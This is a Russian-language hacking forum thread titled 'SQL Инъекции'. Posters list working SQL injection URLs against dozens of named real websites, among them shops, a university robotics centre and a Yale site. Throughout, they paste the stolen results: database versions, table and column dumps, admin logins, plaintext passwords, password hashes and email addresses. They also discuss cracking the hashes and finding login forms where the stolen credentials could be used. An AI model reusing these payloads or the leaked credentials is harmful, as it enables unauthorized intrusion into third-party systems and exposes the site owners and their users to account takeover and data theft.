SQL Инъекции

Межшкольный Эстетический Центр

Code:

http://www.mec-krasnodar.ru/content.php?id=999999999'/**/UNION/**/SELECT/**/1/*

photoisland

Code:

http://www.photoisland.net/pi_art_text.php?lng=1&article_id=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6/*

Компания GFI разработчик игр

Code:

http://www.gfi.su/index1.php?langid=1&idt=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Психологический навигатор

Code:

http://www.psynavigator.ru/articles.php?code=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*

версия бд - 5

Медицинское оборудование

Code:

http://diamedcom.ru/php/content.php?group=1&id=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Formul.Ru Итальянская мебель,кухни из Италии, кровати, гостиные, спальни,кухонные мойки, матрасы

Code:

http://www.formul.ru/privacy.php?n=999999999'/**/UNION/**/SELECT/**/1,2,3,4/*

Доски объявлений. Бесплатная доска объявлений

Code:

http://www.1000dosok.ru/doski.php?kr=999999999'/**/UNION/**/SELECT/**/1/*

Производство и продажа шкафов купе, заказ прихожих, гардеробных и обувниц

Code:

http://www.s-m-c.ru/about/index.php?idmenu=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/*

ООО "Форпост" - продажа мебели оптом и в розницу

Code:

http://www.forpost-perm.ru/spec.php?action=detail&id=999999999/**/UNION/**/SELECT/**/1/*

mebelshop.kiev.ua | магазин мебели

Code:

http://mebelshop.com.ua/index_office.php?param=38&chair_marka=999999999/**/UNION/**/SELECT/**/1,2,3/*

мебель для кухни

Code:

http://www.mebelhall.ru/gallery.php?menu=kux&foto=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

Мебель: стулья, столы, журнальные столики, кресла, диваны

Code:

http://anymebel.ru/index.php?shops=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

Мебель на любой вкус

Code:

http://mebel-miheeff.ru/catalog.php?cat=999999999/**/UNION/**/SELECT/**/1/*

со скулями ухожу в бессрочный отпуск)))


RuDDicK, боян это када выложенная тобой тема уже выкладывалась или обсуждалась и ты ее повторяешь.

 

без проблем:

 

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 4

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=system_user--

generaluser


http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=db_name()--

preview_kccla

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+table_name+from+information_schema.tables)--


http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('STATUS','Admin','Admin_Login','Admin_Login_Level'))--

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+column_name+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in+('AID','Password'))--

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+column_name+from+information_schema.columns+where+table_name='Admin_Login'+and+column_name+not+in+('ID','AdminID','Login','IP','Date_Time'))--

Криважопая база, складывается такое впечатление что данные находятся не в своих столбцах
так например в id хранятся мылы и то не с первой записи, а первая пуста. И логины вроде в AdminID короче что попало(

это логины один какой-то подходит к пасу ниже

logins:
adminweb
adminkcc
adminpat
pat4896



id:[email protected]
pass:choi1979

 

http://www.photoshopchop.com/tutorials/viewcat.php?id=10/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,null,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/139,1/*

http://www.tutorial-s.com/viewcat.php?id=4/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,null,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/4985,1/*

http://readtutorials.com/viewcat.php?id=184/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,null,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/4111,1/*

http://www.capitaltutorials.com/viewcat.php?id=7/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,null,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/1171,1/*

 

От меня немножко уязвимостей в Joomla:

http://4web.ws/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+maybach_users/*
http://www.el-edu.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*

 

lmsports.ru

Code:

http://www.lmsports.ru/forum.html?page=&show=&msgid=-1+union+select+concat_ws(0x3,version(),user(),database())/*

5.0.45-log[email protected]u81617

Code:

http://www.lmsports.ru/forum.html?page=&show=&msgid=-1+union+select+concat_ws(0x3,email,pass)+from+maillist+limit+0,1/*

[email protected]oBJsHzBk

 

http://www.vmprotect.ru
продавцы хорошего протэктора.

Code:

http://www.vmprotect.ru/news.php?id=389+UnIOn+SelEct+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*

5.0.45-community-nt-log:[email protected]:1gb_vmprotect

Code:

http://www.vmprotect.ru/news.php?id=389+UnIOn+SelEct+1,2,3,concat_ws(0x3a,username,user_password),5+from+phpbb_users+limit+1,1/*

Admin:7fbab0f8d4e73b606eb88383e22b72bc

=======================
есть форум phpbb, интересная таблица vmprot_clients

 

kiberpank.ru
Сказка на ночь: Как поимели "киберпанков". Оказалось все банально.

user: [email protected]
database: u46687_kiberpank
version: 5.0.45-log

Смотрим юзверей:

Enjoy.

 

МГТУ им Н.Э.Баумана
научно-учебный центр "роботехника"

Code:

http://www.robot.bmstu.ru/index.php?c=flud&n=467600000+union+select+1,2,3,concat(name,0x3a,hash,0x3a,status),5+from+peoples/*

Акилин Андрей Алексеевич:5fa63f31b9b7c2a6769abc8c21a93a09:1 пасс 1119862833
а куда вставлять хз, есть форма входа
_http://www.robot.bmstu.ru/kaf_test/
но тут нужен логин, которого в табле нет((

Code:

17:archive
17:--1:dt
17:--2:text
17:--3:user
17:--4:status
17:--5:coment
18:board
18:--1:data
18:--2:name
18:--3:mail
18:--4:content
18:--5:status
18:--6:hash
19:club
19:--1:content
20:fluders
20:--1:ip
20:--2:host
20:--3:fluder
20:--4:message
21:materials
21:--1:discipline
21:--2:matname
21:--3:prepod
21:--4:link
22:news
22:--1:data
22:--2:title
22:--3:content
23:pages
23:--1:codename
23:--2:description
23:--3:owner
24:peoples
24:--1:data
24:--2:name
24:--3:mail
24:--4:content
24:--5:status
24:--6:hash
25:prepod
25:--1:name
25:--2:description
25:--3:login
25:--4:pass
25:--5:status
26:sessions
26:--1:login
26:--2:type
27:subpage
27:--1:codename
27:--2:content

 

http://www.taboschar.net/

Code:

http://www.taboschar.net/AllMyGuests/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--

Admin:3d89b9b8a6d81b112d4dc41d11ee5375:[email protected]

 

http://www.thefump.com/lyrics.php?id=-99999+union+select+1,2,3,4,id,6,7,8,9,10,concat_ws(0x3a,username,password,email),12,13+from+users/*

USER: root@localhost
VERSION: 5.0.27-standard
DATABASE: thefump_com_-_fump

всё как на ладоне)

 

http://www.utinam.fr/english/boutique/index.php?FAM_ID=2&RUB_ID=-6+UNION+SELECT+1,2,concat(user,char(58),password),4,5,6,7,8+FROM+mysql.user/*

root:admin

 

http://l2world.uz/dp/m-search.php?itemname=&monsterid=25009'
Гляньте ,может можно раскрутить ?

 

http://ataman-kpc.ru/?art_id=-8+union+select+1,2,version(),4,5,6,7,8

 

Доводи до конца ...

------------------------------------------------------------------------------------------

ataman:225ata90man_16

 

Интернет телевидение
http://tv-portal.ru/index.php?kanal=-57+UNION+SELECT+1,2,concat(id,0x3a,name,0x3a,pass),database(),5,user(),7,8,9,10,version()+from+users+limit+1,1/*
database - [email protected]
user - db_kokos32_2
version - 4.1.21-log

меняем limit+1(2,3,4...),1/* получаем ИД,Имя,Пароль

 

2-=megahertz=- только хз куда эти логины и пассы= )
там авторизаций ничего нету =) а в админку пассы не подходят

 

NFm попробуй подбери другую таблицу... я кроме юзерс ничего не искал...

 

Code:

ht_tp://[COLOR=Magenta]uskniedernsill.us.funpic.de[/COLOR]/AllMyGuests0.4.1/index.php?AMG_open=comments&AMG_id=111%20UNION+SELECT+1,2,3,%20concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--

stefanhofer : e8cd3fd55a1f0100bb692431c649844c :[email protected]
Пробую вскрыть хэш!!!

 

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,concat_ws(0x2f,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,id,17,18,20,21,22,23,24,25+from+users+limit+1,1/*
version() : 4.0.24-log database():rwj user(): [email protected]

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,id,17,18,20,21,22,23,24,25+from+users+limit+1,1/*




http://www.moscowbooks.ru/news/view.asp?id=-1+or+1=@@version--